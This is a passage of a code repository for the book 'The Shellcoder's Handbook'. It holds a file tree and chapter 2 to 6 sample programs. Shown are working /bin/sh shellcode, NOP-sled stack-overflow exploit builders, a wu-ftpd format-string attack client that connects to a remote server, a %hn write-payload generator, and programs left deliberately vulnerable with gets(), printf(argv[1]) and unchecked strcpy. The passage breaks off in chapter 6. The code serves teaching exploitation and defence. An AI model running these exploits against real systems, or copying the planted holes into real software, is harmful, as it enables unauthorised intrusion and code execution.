├── Chapter_02 ├── Shellcoders02sampleprogram01.c ├── Shellcoders02sampleprogram02.c ├── Shellcoders02sampleprogram03.c ├── Shellcoders02sampleprogram04.c ├── Shellcoders02sampleprogram05.c ├── Shellcoders02sampleprogram06.c └── Shellcoders02sampleprogram07.c ├── Chapter_03 ├── Shellcoders03sampleprogram01.c ├── Shellcoders03sampleprogram02.c └── Shellcoders03sampleprogram03.c ├── Chapter_04 ├── Shellcoders04WU-FTP-Exploit1.c ├── Shellcoders04WU-FTP-Exploit2.c ├── Shellcoders04sampleprogram01.c ├── Shellcoders04sampleprogram02.c └── Shellcoders04sampleprogram03.c ├── Chapter_05 ├── Shellcoders05codesnippet01.c ├── Shellcoders05heapexploit01.c ├── Shellcoders05sampleprogram01.c ├── Shellcoders05sampleprogram02.c └── Shellcoders05sampleprogram03.c ├── Chapter_06 └── Shellcoders06codesnippet01.c ├── Chapter_07 ├── Shellcoders07sampleprogram01.c └── Shellcoders07sampleprogram02.c ├── Chapter_08 ├── Shellcoders08sampleprogram01.c ├── Shellcoders08sampleprogram02.c ├── Shellcoders08sampleprogram03.c ├── Shellcoders08sampleprogram04.c ├── Shellcoders08sampleprogram05.c ├── Shellcoders08sampleprogram06.c ├── Shellcoders08sampleprogram07.c ├── Shellcoders08sampleprogram08.c ├── Shellcoders08sampleprogram09.c ├── Shellcoders08sampleprogram10.c ├── Shellcoders08sampleprogram11.c ├── Shellcoders08sampleprogram12.c └── Shellcoders08sampleprogram13.c ├── Chapter_09 ├── Shellcoders09codesnippet01.txt ├── Shellcoders09codesnippet02.txt ├── Shellcoders09codesnippet03.txt ├── Shellcoders09codesnippet04.txt ├── Shellcoders09codesnippet05.txt ├── Shellcoders09codesnippet06.txt ├── Shellcoders09codesnippet07.txt ├── Shellcoders09codesnippet08.txt ├── Shellcoders09codesnippet09.txt ├── Shellcoders09sampleprogram01.c └── Shellcoders09sampleprogram02.c ├── Chapter_11 ├── Shellcoders11-BF_shell.s ├── Shellcoders11-dtspcd-exploit.py ├── Shellcoders11-find_sym.c ├── Shellcoders11sampleprogram01.c └── Shellcoders11sampleprogram02.c ├── Chapter_12 ├── Shellcoders12-bindsocket.txt ├── Shellcoders12-connectback.txt ├── Shellcoders12-findsocket.txt ├── Shellcoders12-rpc-ttdbserverd-exploit.txt ├── Shellcoders12sampleprogram01.c ├── Shellcoders12sampleprogram01.txt ├── Shellcoders12sampleprogram02.c ├── Shellcoders12sampleprogram02.txt ├── Shellcoders12sampleprogram03.c ├── Shellcoders12sampleprogram03.txt ├── Shellcoders12sampleprogram04.c ├── Shellcoders12sampleprogram04.txt ├── Shellcoders12sampleprogram05.txt ├── Shellcoders12sampleprogram06.txt └── Shellcoders12sampleprogram07.txt ├── Chapter_14 ├── bin │ ├── RIOT.exe │ ├── faultmon.exe │ └── input_store │ │ ├── 1.dat │ │ ├── 2.dat │ │ └── 3.dat └── src │ ├── FaultInject.cpp │ ├── FaultInject.h │ ├── NetIO.cpp │ ├── NetIO.h │ ├── RIOT.cpp │ ├── RIOT.dsp │ ├── RIOT.dsw │ └── input_store │ ├── 1.dat │ ├── 2.dat │ └── 3.dat ├── Chapter_15 └── Shellcoders15-dtloginspike.txt ├── Chapter_17 └── Shellcoders17sampleprogram01.txt ├── Chapter_18 ├── Shellcoders18-vtinject-cpp.txt ├── Shellcoders18-vulntrace-cpp.txt └── Shellcoders18sampleprogram01.txt ├── Chapter_20 └── Shellcoders20-rsc-c.txt ├── Chapter_21 └── Shellcoders21sampleprogram01.txt ├── Chapter_22 ├── Shellcoders22-ibm-db2-exploit.txt ├── Shellcoders22-xdb-exploit-linux.txt └── Shellcoders22-xdb-exploit-win32.txt ├── Chapter_23 └── Shellcoders23-OpenBSD-select()-exploit.txt ├── Chapter_24 ├── Shellcoders24-OpenBSD-exploit1-c.txt ├── Shellcoders24-moka-c.txt ├── Shellcoders24-solaris-vfs_getvfssw()-exploit.txt ├── Shellcoders24exec_ibcs2_coff_prep_zmagic()-exploit.txt ├── Shellcoders24sampleprogram01.txt └── Shellcoders24sampleprogram02.txt ├── LICENSE └── README.md /Chapter_02/Shellcoders02sampleprogram01.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_02/Shellcoders02sampleprogram01.c -------------------------------------------------------------------------------- /Chapter_02/Shellcoders02sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 2: Stack Overflows 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | int main () { 17 | 18 | int array[5]; 19 | int i; 20 | 21 | for (i = 0; i <= 255; ++i){ 22 | array[i] = 10; 23 | } 24 | } 25 | 26 | -------------------------------------------------------------------------------- /Chapter_02/Shellcoders02sampleprogram03.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_02/Shellcoders02sampleprogram03.c -------------------------------------------------------------------------------- /Chapter_02/Shellcoders02sampleprogram04.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 2: Stack Overflows 10 | Sample Program #4 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | void return_input (void){ 17 | char array[30]; 18 | 19 | gets (array); 20 | printf("%s\n", array); 21 | 22 | } 23 | 24 | 25 | main() { 26 | return_input(); 27 | 28 | return 0; 29 | 30 | } 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /Chapter_02/Shellcoders02sampleprogram05.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 2: Stack Overflows 10 | Sample Program #5 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | char shellcode[] = 17 | "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" 18 | "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" 19 | "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; 20 | 21 | 22 | int main() 23 | { 24 | 25 | int *ret; 26 | ret = (int *)&ret + 2; 27 | (*ret) = (int)shellcode; 28 | } 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /Chapter_02/Shellcoders02sampleprogram06.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 2: Stack Overflows 10 | Sample Program #6 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | 18 | #define offset_size 0 19 | #define buffer_size 512 20 | 21 | char sc[] = 22 | "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" 23 | "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" 24 | "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; 25 | 26 | 27 | unsigned long find_start(void) { 28 | __asm__("movl %esp,%eax"); 29 | } 30 | 31 | int main(int argc, char *argv[]) 32 | { 33 | char *buff, *ptr; 34 | long *addr_ptr, addr; 35 | int offset=offset_size, bsize=buffer_size; 36 | int i; 37 | 38 | if (argc > 1) bsize = atoi(argv[1]); 39 | if (argc > 2) offset = atoi(argv[2]); 40 | 41 | addr = find_start() - offset; 42 | printf("Attempting address: 0x%x\n", addr); 43 | 44 | ptr = buff; 45 | addr_ptr = (long *) ptr; 46 | for (i = 0; i < bsize; i+=4) 47 | *(addr_ptr++) = addr; 48 | 49 | ptr += 4; 50 | 51 | for (i = 0; i < strlen(sc); i++) 52 | *(ptr++) = sc[i]; 53 | 54 | buff[bsize - 1] = '\0'; 55 | 56 | memcpy(buff,"BUF=",4); 57 | putenv(buff); 58 | system("/bin/bash"); 59 | } 60 | 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /Chapter_02/Shellcoders02sampleprogram07.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 2: Stack Overflows 10 | Sample Program #7 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | 18 | #define DEFAULT_OFFSET 0 19 | #define DEFAULT_BUFFER_SIZE 512 20 | #define NOP 0x90 21 | 22 | char shellcode[] = 23 | 24 | "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" 25 | "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" 26 | "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; 27 | 28 | 29 | unsigned long get_sp(void) { 30 | __asm__("movl %esp,%eax"); 31 | } 32 | 33 | void main(int argc, char *argv[]) 34 | { 35 | char *buff, *ptr; 36 | long *addr_ptr, addr; 37 | int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; 38 | int i; 39 | 40 | if (argc > 1) bsize = atoi(argv[1]); 41 | if (argc > 2) offset = atoi(argv[2]); 42 | 43 | if (!(buff = malloc(bsize))) { 44 | printf("Can't allocate memory.\n"); 45 | exit(0); 46 | } 47 | 48 | addr = get_sp() - offset; 49 | printf("Using address: 0x%x\n", addr); 50 | 51 | ptr = buff; 52 | addr_ptr = (long *) ptr; 53 | for (i = 0; i < bsize; i+=4) 54 | *(addr_ptr++) = addr; 55 | 56 | for (i = 0; i < bsize/2; i++) 57 | buff[i] = NOP; 58 | 59 | ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); 60 | for (i = 0; i < strlen(shellcode); i++) 61 | *(ptr++) = shellcode[i]; 62 | 63 | buff[bsize - 1] = '\0'; 64 | 65 | memcpy(buff,"BUF=",4); 66 | putenv(buff); 67 | system("/bin/bash"); 68 | } 69 | 70 | 71 | -------------------------------------------------------------------------------- /Chapter_03/Shellcoders03sampleprogram01.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 3: Shellcode 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | char shellcode[] = "\xbb\x00\x00\x00\x00" 17 | "\xb8\x01\x00\x00\x00" 18 | "\xcd\x80"; 19 | 20 | int main() 21 | { 22 | int *ret; 23 | ret = (int *)&ret + 2; 24 | (*ret) = (int)shellcode; 25 | } 26 | 27 | -------------------------------------------------------------------------------- /Chapter_03/Shellcoders03sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 3: Shellcode 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | char shellcode[] = "\xbb\x00\x00\x00\x00" 17 | "\xb8\xfc\x00\x00\x00" 18 | "\xcd\x80"; 19 | 20 | int main() 21 | { 22 | 23 | int *ret; 24 | ret = (int *)&ret + 2; 25 | (*ret) = (int)shellcode; 26 | } 27 | 28 | 29 | -------------------------------------------------------------------------------- /Chapter_03/Shellcoders03sampleprogram03.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 3: Shellcode 10 | Sample Program #3 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | char shellcode[] = 17 | "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" 18 | "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" 19 | "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41" 20 | "\x4b\x4b\x4b\x4b"; 21 | 22 | int main() 23 | { 24 | 25 | int *ret; 26 | ret = (int *)&ret + 2; 27 | (*ret) = (int)shellcode; 28 | } 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /Chapter_04/Shellcoders04WU-FTP-Exploit1.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 4: Introduction to Format String Bugs 10 | wu-FTP Exploit #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | 30 | int connect_to_server(char*host){ 31 | struct hostent *hp; 32 | struct sockaddr_in cl; 33 | int sock; 34 | 35 | if(host==NULL||*host==(char)0){ 36 | fprintf(stderr,"Invalid hostname\n"); 37 | 38 | exit(1); 39 | 40 | } 41 | 42 | if((cl.sin_addr.s_addr=inet_addr(host))==-1) 43 | { 44 | if((hp=gethostbyname(host))==NULL) 45 | { 46 | fprintf(stderr,"Cannot resolve %s\n",host); exit(1); 47 | } 48 | 49 | memcpy((char*)&cl.sin_addr,(char*)hp->h_addr,sizeof(cl.sin_addr)); 50 | 51 | } 52 | if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) 53 | { 54 | 55 | fprintf(stderr,"Error creating socket: %s\n",strerror(errno)); 56 | exit(1); 57 | } 58 | 59 | cl.sin_family=PF_INET; 60 | cl.sin_port=htons(21); 61 | 62 | if(connect(sock,(struct sockaddr*)&cl,sizeof(cl))==-1) 63 | { 64 | fprintf(stderr,"Cannot connect to %s: %s\n",host,strerror(errno)); 65 | } 66 | 67 | return sock; 68 | } 69 | 70 | 71 | int receive_from_server( int s, int print ) 72 | { 73 | int retval; 74 | char buff[ 1024 * 64]; 75 | 76 | memset( buff, 0, 1024 * 64 ); 77 | retval = recv( s, buff, (1024 * 63), 0 ); 78 | if( retval > 0 ) 79 | { 80 | if( print ) 81 | printf( "%s", buff ); 82 | } 83 | else 84 | { 85 | if( print) 86 | printf( "Nothing to recieve\n" ); 87 | 88 | return 0; 89 | } 90 | 91 | return 1; 92 | } 93 | 94 | int ftp_send( int s, char *psz ) 95 | { 96 | send( s, psz, strlen( psz ), 0 ); 97 | return 1; 98 | } 99 | 100 | 101 | int syntax() 102 | { 103 | printf("Use\ndo_wu \n"); 104 | return 1; 105 | } 106 | 107 | 108 | int main( int argc, char *argv[] ) 109 | { 110 | int s; 111 | char buff[ 1024 * 64 ]; 112 | char tmp[ 4096 ]; 113 | 114 | if( argc != 4 ) 115 | return syntax(); 116 | 117 | s = connect_to_server( argv[1] ); 118 | 119 | if( s <= 0 ) 120 | _exit( 1 ); 121 | 122 | receive_from_server( s, 0 ); 123 | 124 | ftp_send( s, "user anonymous\n" ); 125 | receive_from_server( s, 0 ); 126 | ftp_send( s, "pass foo@example.com\n" ); 127 | 128 | receive_from_server( s, 0 ); 129 | 130 | if( atoi( argv[3] ) == 1 ) 131 | { 132 | printf("Press a key to send the string...\n"); 133 | getc( stdin ); 134 | } 135 | 136 | strcat( buff, "site index " ); 137 | sprintf( tmp, "%.4000s\n", argv[2] ); 138 | strcat( buff, tmp ); 139 | 140 | ftp_send( s, buff ); 141 | 142 | receive_from_server( s, 1 ); 143 | 144 | shutdown( s, SHUT_RDWR ); 145 | 146 | return 1; 147 | } 148 | 149 | 150 | 151 | 152 | 153 | -------------------------------------------------------------------------------- /Chapter_04/Shellcoders04WU-FTP-Exploit2.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 4: Introduction to Format String Bugs 10 | wu-FTP Exploit #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int safe_strcat( char *dest, char *src, unsigned dest_len ) 20 | { 21 | if( ( dest == NULL ) || ( src == NULL ) ) 22 | return 0; 23 | 24 | if ( strlen( src ) + strlen( dest ) + 10 >= dest_len ) 25 | return 0; 26 | 27 | strcat( dest, src ); 28 | 29 | return 1; 30 | } 31 | 32 | int err( char *msg ) 33 | { 34 | printf("%s\n", msg); 35 | return 1; 36 | } 37 | 38 | int main( int argc, char *argv[] ) 39 | { 40 | // modify the strings below to upload different data to the wu-ftpd process... 41 | char *string_to_upload = "mary had a little lamb"; 42 | unsigned int addr = 0x0806d3b0; 43 | 44 | // this is the offset of the parameter that 'contains' the start of our string. 45 | unsigned int param_num = 272; 46 | char buff[ 4096 ] = ""; 47 | int buff_size = 4096; 48 | char tmp[ 4096 ] = ""; 49 | int i, j, num_so_far = 6, num_to_print, num_so_far_mod; 50 | unsigned short s; 51 | char *psz; 52 | int num_addresses, a[4]; 53 | 54 | // first work out How many addresses there are. num bytes / 2 + num bytes mod 2. 55 | 56 | num_addresses = (strlen( string_to_upload ) / 2) + strlen( string_to_upload) % 2; 57 | 58 | for( i = 0; i < num_addresses; i++ ) 59 | { 60 | a[0] = addr & 0xff; 61 | a[1] = (addr & 0xff00) >> 8; 62 | a[2] = (addr & 0xff0000) >> 16; 63 | a[3] = (addr) >> 24; 64 | 65 | sprintf( tmp, "\\x%.02x\\x%.02x\\x%.02x\\x%.02x", a[0], a[1], a[2], a[3] ); 66 | 67 | if( !safe_strcat( buff, tmp, buff_size )) 68 | return err("Oops. Buffer too small."); 69 | 70 | addr += 2; 71 | 72 | num_so_far += 4; 73 | } 74 | 75 | printf( "%s\n", buff ); 76 | 77 | // now upload the string 2 bytes at a time. Make sure that num_so_far is appropriate by doing %2000x or whatever. 78 | psz = string_to_upload; 79 | 80 | while( (*psz != 0) && (*(psz+1) != 0) ) 81 | { 82 | // how many chars to print to make (so_far % 64k)==s 83 | // 84 | s = *(unsigned short *)psz; 85 | 86 | num_so_far_mod = num_so_far &0xffff; 87 | 88 | num_to_print = 0; 89 | 90 | if( num_so_far_mod < s ) 91 | num_to_print = s - num_so_far_mod; 92 | else 93 | if( num_so_far_mod > s ) 94 | num_to_print = 0x10000 - (num_so_far_mod - s); 95 | 96 | // if num_so_far_mod and s are equal, we'll 'output' s any-way :o) 97 | num_so_far += num_to_print; 98 | 99 | // print the difference in characters 100 | if( num_to_print > 0 ) 101 | { 102 | sprintf( tmp, "%%%dx", num_to_print ); 103 | if(!safe_strcat( buff, tmp, buff_size )) 104 | return err("Buffer too small."); 105 | } 106 | 107 | // now upload the 'short' value 108 | sprintf( tmp, "%%%d$hn", param_num ); 109 | if( !safe_strcat( buff, tmp, buff_size )) 110 | return err("Buffer too small."); 111 | 112 | psz += 2; 113 | param_num++; 114 | } 115 | 116 | printf( "%s\n", buff ); 117 | 118 | sprintf( tmp, "./dowu localhost $'%s' 1\n", buff ); 119 | 120 | system( tmp ); 121 | 122 | return 0; 123 | } 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | -------------------------------------------------------------------------------- /Chapter_04/Shellcoders04sampleprogram01.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 4: Introduction to Format String Bugs 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int main( int argc, char *argv[] ) 20 | { 21 | int c; 22 | 23 | printf( "Decimal Hex Character\n" ); 24 | printf( "======= === =========\n" ); 25 | 26 | for( c = 0x20; c < 256; c++ ) 27 | { 28 | switch( c ) 29 | { 30 | case 0x0a: 31 | case 0x0b: 32 | case 0x0c: 33 | case 0x0d: 34 | case 0x1b: 35 | printf( " %03d %02x \n", c, c ); 36 | break; 37 | default: 38 | printf( " %03d %02x %c\n", c, c, c ); 39 | break; 40 | } 41 | } 42 | 43 | return 1; 44 | } 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /Chapter_04/Shellcoders04sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 4: Introduction to Format String Bugs 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int main( int argc, char *argv[] ) 20 | { 21 | if( argc != 2 ) 22 | { 23 | printf("Error - supply a format string please\n"); 24 | return 1; 25 | } 26 | 27 | printf( argv[1] ); 28 | printf( "\n" ); 29 | 30 | return 0; 31 | } 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /Chapter_04/Shellcoders04sampleprogram03.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 4: Introduction to Format String Bugs 10 | Sample Program #3 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | #include 17 | #include 18 | 19 | int main() 20 | { 21 | asm("\ 22 | xor %eax, %eax;\ 23 | xor %ecx, %ecx;\ 24 | xor %edx, %edx;\ 25 | mov $0x01, %al;\ 26 | xor %ebx, %ebx;\ 27 | mov $0x02, %bl;\ 28 | int $0x80;\ 29 | "); 30 | 31 | return 1; 32 | } 33 | 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /Chapter_05/Shellcoders05codesnippet01.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 5: Heap Overflows 10 | Code Snippet #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | bin = bin_at(av, idx); 17 | 18 | for (victim = last(bin); victim != bin; victim = victim->bk) { 19 | size = chunksize(victim); 20 | 21 | if ((unsigned long)(size) >= (unsigned long)(nb)) { 22 | remainder_size = size - nb; 23 | unlink(victim, bck, fwd); 24 | 25 | /* Exhaust */ 26 | 27 | if (remainder_size < MINSIZE) { 28 | set_inuse_bit_at_offset(victim, size); 29 | if (av != &main_arena) 30 | victim->size |= NON_MAIN_ARENA; 31 | check_malloced_chunk(av, victim, nb); 32 | return chunk2mem(victim); 33 | } 34 | 35 | /* Split */ 36 | 37 | else { 38 | remainder = chunk_at_offset(victim, nb); 39 | unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder; 40 | remainder->bk = remainder->fd = unsorted_chunks(av); 41 | set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); 42 | set_head(remainder, remainder_size | PREV_INUSE); 43 | set_foot(remainder, remainder_size); 44 | check_malloced_chunk(av, victim, nb); 45 | return chunk2mem(victim); 46 | } 47 | } 48 | } 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /Chapter_05/Shellcoders05heapexploit01.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_05/Shellcoders05heapexploit01.c -------------------------------------------------------------------------------- /Chapter_05/Shellcoders05sampleprogram01.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 5: Heap Overflows 10 | Sample Program #1 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | /*notvuln.c*/ 17 | 18 | int 19 | main(int argc, char** argv) { 20 | 21 | char *buf; 22 | buf=(char*)malloc(1024); 23 | printf("buf=%p",buf); 24 | strcpy(buf,argv[1]); 25 | free(buf); 26 | 27 | } 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /Chapter_05/Shellcoders05sampleprogram02.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 5: Heap Overflows 10 | Sample Program #2 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | /*basicheap.c*/ 17 | 18 | int main(int argc, char** argv) { 19 | 20 | char *buf; 21 | char *buf2; 22 | buf=(char*)malloc(1024); 23 | buf2=(char*)malloc(1024); 24 | printf("buf=%p buf2=%p\n",buf,buf2); 25 | strcpy(buf,argv[1]); 26 | free(buf2); 27 | 28 | } 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /Chapter_05/Shellcoders05sampleprogram03.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devzero2000/shellcoderhandbook/9da300b22f82e3b9f0888de60e6fb2a029a53a0e/Chapter_05/Shellcoders05sampleprogram03.c -------------------------------------------------------------------------------- /Chapter_06/Shellcoders06codesnippet01.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | The Shellcoder's Handbook: Discovering and Exploiting Security Holes 4 | Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 5 | Sinan Eren, Neel Mehta, Riley Hassell 6 | Publisher: John Wiley & Sons 7 | ISBN: 0764544683 8 | 9 | Chapter 6: Wild World of Windows 10 | Sample Program #3 11 | 12 | Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 13 | 14 | */ 15 | 16 | [ uuid(e33c0cc4-0482-101a-bc0c-02608c6ba218), 17 | version(1.0), 18 | implicit_handle(handle_t rpc_binding) 19 | ] interface ??? 20 | 21 | { 22 | typedef struct { 23 | TYPE_2 element_1; 24 | TYPE_3 element_2; 25 | } TYPE_1; 26 | 27 | ... 28 | 29 | short Function_00( 30 | [in] long element_9, 31 | [in] [unique] [string] wchar_t *element_10, 32 | [in] [unique] TYPE_1 *element_11, 33 | [in] [unique] TYPE_1 *element_12, 34 | [in] [unique] TYPE_2 *element_13, 35 | [in] long element_14, 36 | [in] long element_15, 37 | [out] [context_handle] void 